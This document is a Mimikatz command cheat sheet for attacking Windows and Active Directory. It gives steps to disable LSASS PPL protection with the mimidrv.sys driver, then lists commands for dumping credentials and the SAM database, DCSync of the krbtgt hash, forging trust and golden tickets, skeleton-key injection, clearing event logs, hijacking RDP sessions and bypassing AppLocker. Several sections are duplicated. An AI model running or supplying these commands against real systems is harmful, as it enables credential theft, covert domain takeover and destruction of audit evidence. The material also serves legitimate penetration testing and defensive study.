PPL protection is controlled by a bit residing in the EPROCESS kernel object associated with the target process. If we could obtain code execution in kernel space, we could disable the LSA protection and dump the credentials..
this can be achieved with Mimikatz since it comes bundled with the mimidrv.sys driver.
We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers. Mimikatz can load the mimidrv.sys driver with the !+ command:
mimikatz # !+
Once the driver is loaded, we can use it to disable the PPL protection for LSASS:
While this technique will disable the LSA Protection it does require that we upload the mimidrv.sys driver to the victim machine, which may trigger antivirus.
LSA PPL is now disabled:
mimikatz # sekurlsa::logonpasswords
List commands in module
Just type in the name of the module followed by :: and press enter
kerberos::
sekurlsa::
Base64 output of commands
base64 /out:true
base64 /out:false
dump the sam file
lsadump::sam
lsadump::sam /patch
Event
drop new event logs in system
event::drop
clear all event logs
event::clear
lsadump
LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).
LSADUMP::SetNTLM – Ask a server to set a new password/ntlm for one user.
LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
sekurlsa
messing with LSA:
# list LM & NTLM credentials
mimikatz sekurlsa::msv
# Lists WDigest credentials
mimikatz sekurlsa::wdigest
# Lists Kerberos credentials
mimikatz sekurlsa::kerberos <I've seen this pull plain text passwords>
# Lists TsPkg credentials
mimikatz sekurlsa::tspkg
# Lists LiveSSP credentials
mimikatz sekurlsa::livessp
# Lists SSP credentials
mimikatz sekurlsa::ssp
# Lists all available providers credentials
mimikatz sekurlsa::logonPasswords
# Switch (or reinit) to LSASS process context
mimikatz sekurlsa::process
# Switch (or reinit) to LSASS minidump context
mimikatz sekurlsa::minidump
# Antisocial :)
mimikatz sekurlsa::trust
# Preferred Backup Master keys
mimikatz sekurlsa::backupkeys
# List Kerberos tickets
mimikatz sekurlsa::tickets
# List Kerberos Encryption Keys
mimikatz sekurlsa::ekeys
# List Cached MasterKeys
mimikatz sekurlsa::dpapi
# List Credentials Manager
mimikatz sekurlsa::credman
LSADUMP::SAM –> get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
LSADUMP::Secrets –> get the SysKey to decrypt SECRETS entries (from registry or hives).
LSADUMP::SetNTLM –> Ask a server to set a new password/ntlm for one user.
LSADUMP::Trust –> Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
#list all
token::list
# important tokens
token::list /user:administrator
token::list /user:domainadmin
token::list /user:enterpriseadmin
token::list /user:system\
Run process with a token
token::run /process:cmd.exe
Get / revert those privileges
token::revert
token::elevate
kerberos
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of “klist”.
KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
/filename – the ticket’s filename (can be multiple)
/diretory – a directory path, all .kirbi files inside will be injected.
KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.
KERBEROS::TGT – get current TGT for current user.
MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
"privilege::debug" "misc::skeleton"
Trust Ticket
Once the Active Directory Trust password hash is determined, a trust ticket can be generated. The trust tickets are created using the shared password between 2 Domains that trust each other.
Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.
# Dumping trust passwords (trust keys)
Mimikatz “privilege::debug” “lsadump::trust /patch” exit
# Create a forged trust ticket (inter-realm TGT) using Mimikatz
Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit
## parameters:
/target – the target domain’s FQDN.
/service – the kerberos service running in the target domain (krbtgt).
/rc4 – the NTLM hash for the service kerberos service account (krbtgt).
/ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of “klist”.
KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.
KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).
/filename – the ticket’s filename (can be multiple)
/diretory – a directory path, all .kirbi files inside will be injected.
KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.
KERBEROS::TGT – get current TGT for current user.
DCShadow / DCSync
Set the current machines as DC to have the habitability to create new objects inside the DC (persistent method).
LSADUMP::DCShadow
This requires full AD admin rights or KRBTGT pw hash. DCShadow temporarily sets the computer to be a “DC” for the purposes of replication: Creates 2 objects in the AD forest Configuration partition.
ask a DC to synchronize an object (get password data for account) Requires membership in Domain Administrator, domain Administrators, or custom delegation.
LSADUMP::DCSync
Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit
Mimikatz “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit
# DCSync Options:
/all – DCSync pull data for the entire domain.
/user – user id or SID of the user you want to pull the data for.
/domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.
/csv – export to csv
/dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.
NetSync
NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data.
# allow multi-session rdp
ts::multirdp
# List all current sessions
ts::sessions
# Takeover specified session
ts::remote /id:1
# Pass RDP session into other sessions ID
ts::remote /id:1 /target:2
# Use password of user who owns sessions
ts::remote /id:1 /password:F@ll2019!
Applocker bypass
Misc in mimikatz may be able to launch apps blocked by applocker etc.
misc::cmd
misc::regedit
# Some kind of filter that can tell if it's running sysmon, kaspersky etc
misc::mflt
# This will inject into explorer.exe for sneakiness
misc::wp /file:tacos.jpg
